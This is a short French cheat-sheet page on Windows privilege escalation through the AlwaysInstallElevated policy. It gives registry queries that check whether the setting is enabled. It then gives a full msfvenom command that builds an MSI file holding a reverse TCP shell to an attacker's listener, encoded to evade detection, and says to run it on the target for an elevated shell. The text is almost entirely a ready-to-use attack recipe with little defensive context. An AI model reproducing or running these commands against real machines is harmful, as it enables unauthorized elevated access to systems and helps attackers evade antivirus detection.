Vérification du Paramètre AlwaysInstallElevated
Description : Le paramètre
AlwaysInstallElevatedpermet l'installation de programmes MSI avec des privilèges élevés sans requérir explicitement les droits d'administrateur. Si activé, il peut être exploité pour obtenir une élévation de privilège.Commandes de Vérification :
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevatedCes commandes vérifient si le paramètre est activé dans les registres HKCU (HKEY_CURRENT_USER) et HKLM (HKEY_LOCAL_MACHINE). Une réponse "0x1" indique que le paramètre est activé.
Création d'un Reverse Shell avec MSFVenom
Commande :
msfvenom --platform windows --arch x64 --payload windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=6666 --encoder x64/xor --iterations 9 --format msi --out AlwaysInstallElevated.msiDescription : Cette commande utilise MSFVenom pour créer un fichier MSI contenant un payload de reverse shell. Le fichier MSI peut ensuite être exécuté sur la machine cible pour obtenir un shell avec des privilèges élevés.
Détails :
--platform windowset--arch x64spécifient la plateforme et l'architecture cible.--payload windows/x64/shell_reverse_tcpdéfinit le payload pour un reverse shell TCP.LHOST=tun0etLPORT=6666définissent l'adresse et le port de l'écouteur sur l'attaquant.--encoder x64/xoret--iterations 9appliquent un encodage pour échapper à la détection.--format msispécifie le format de sortie comme MSI.--out AlwaysInstallElevated.msinomme le fichier de sortie.
Exploitation
- Exécution du Fichier MSI : Une fois le fichier MSI créé, il peut être exécuté sur la machine cible. Si
AlwaysInstallElevatedest activé, le reverse shell sera lancé avec des privilèges élevés.